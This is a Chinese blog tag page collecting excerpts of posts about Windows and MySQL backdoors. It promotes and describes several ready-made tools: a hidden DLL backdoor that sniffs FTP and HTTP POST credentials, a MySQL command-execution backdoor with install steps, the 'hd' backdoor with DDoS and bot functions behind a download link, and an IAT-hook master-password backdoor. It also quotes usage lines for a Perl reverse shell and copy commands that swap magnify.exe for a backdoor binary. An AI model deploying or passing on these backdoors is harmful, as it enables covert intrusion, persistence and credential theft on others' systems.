标签 ‘BackDoor’ 下的日志

利用WMI打造完美“三无”后门-消灭一切假网卡

来源:菠萝的菠萝格

Welcome!各位ScriptKid,欢迎来到脚本世界。

这年头,貌似除了我们呼吸的空气,什么都有假的,有的假的比那真的还真的。更别说在0101的虚拟世界了。hi,请问你是阿猫还是阿狗?:)

如何从一大堆诸如VMWARE之类的软件所模拟的假网卡中找到那块我们需要的真实的物理网卡并且确定确实有个真的网线插在上面,是摆在我们面前的第一个问题。更何况,用MAC地址来进行机器管理,相对还比较可靠^0^

WMI里主要有关网卡的类有三个:Win32_NetworkAdapter,Win32_NetworkAdapterConfiguration和Win32_NetworkAdapterSetting,都是位于CIMV2名称空间。
阅读全文 »

Tags: ,

利用WMI打造完美“三无”后门(序章)

来源:菠萝的菠萝格

Welcome!各位ScriptKid,欢迎来到脚本世界。从今天开始小弟我会连载这篇《利用WMI打造完美“三无”后门》。

序章

在正式开始之前,请允许小弟先介绍一下时代背景,人物性格。

这个后门完成于2006年的这个时候。其主要的思路来自于zzzevazzz大虾的《深入挖掘windows脚本技术》,感谢zzzevazzz提 供了一个这么好的思路。其另外的一篇《Do All in Cmd Shell》也是一篇非常不错的文章。顺便提一句,本文欢迎一切形式的转载,复制粘贴,但请至少保留zzzevazzz字样,谢谢。

在这篇连载里我不会向大家介绍一个完整的可运行的wmi后门代码,而会将其按照运作的流程结构以及功能,分别给大家介绍一下强大的wmi和vbscript脚本带给我们的好处。有想用来干坏事的同学请自行研究,You are not Welcome.
阅读全文 »

Tags: ,

HWay V3.0

作者:linx2008

HwaV3.0优点如下:

1.DLL后门,利用svchost.exe启动,隐蔽进程
2.利用sniff的方式接受命令,实现了无端口的后门,但也可以指定Hway监听133端口接受正向连接。
3.同时支持正向和反向两种连接方式
4.支持文件上传,下载,屏幕截图,进程查杀等功能
5.使用了进程保护.但只在DLL被退出时才把dll注入到explorer.Exe进行进程保护,降低了系统消耗.
6.具有嗅探器的功能,把嗅探到的FTP帐号和来自HTTP POST的敏感信息记录到” system32\snifflogV3.log”下 (这里有个bug:嗅探一段时间后,snifflogV3.log可能会变得很大)
阅读全文 »

Tags:

Mysql BackDoor

作者:linx2008

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的”state”函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.

[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击”自动安装Mysql BackDoor”

安装成功后,Mysql上便会增加一个”state”函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
阅读全文 »

Tags: ,

hd

鬼仔注:很早之前拿到一份,但是没怎么用过,现在有人公布了。

下载地址:http://www.ncph.net/soft/hd.rar | 备用
来源:NCPH

一. 后门主要模块介绍
==========================================================================================

1. 后门服务端
a. 后门功能
b. 后门管理
c. 文件目录操作
d. 执行程序操作
e. 系统操作
f. Shell功能
g. Proxy功能
h. DDoS功能
i. HBot功能
j. 附加功能
阅读全文 »

Tags: ,

利用IAT hook实现windows通用密码后门

鬼仔注:在7j那里看到的。

来源:看雪学院
作者:clyfish

windows有通用密码吗?
去问比尔大叔吧。

先不管是不是真的有,我们可以自己实现一个这样的后门。

先简单介绍一下windows登陆过程中的一些过程。
winlogon进程用gina.dll获取用户名和密码,通过LPC传给lsass进程。
然后lsass进程调用默认认证包msv1_0.dll来验证密码的对错。
而msv1_0则从SAM中获得用户的信息,包括密码的哈希。
阅读全文 »

Tags: ,

perl后门,正向和反向

作者:小杰

都是使用nc监听!
反向连接代码:

#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type 'exit' to exit or press Enter to gain shell when u under the 'console'.
#nc -vv -l -p 1988
#perl backdoor.pl 127.0.0.1 1988    
 阅读全文 »
Tags: ,

放大镜后门生成器

来源:红狼论坛
PS:刚刚在红狼论坛看到的,具体未测试…简单看了下,估计是类似以前那种 shift 后门差不多….
设本程序为ivy.exe则运行以下命令即可

copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe
copy ivy.exe %systemroot%\system32\magnify.exe
copy ivy.exe %systemroot%\system32\dllcache\magnify.exe

注:win+u,选择放大镜,输入你设定的后门启动密码,可执行cmd.exe和程序自己添加自定义用户(调用API防止cmd.exe被禁用)
阅读全文 »

Tags: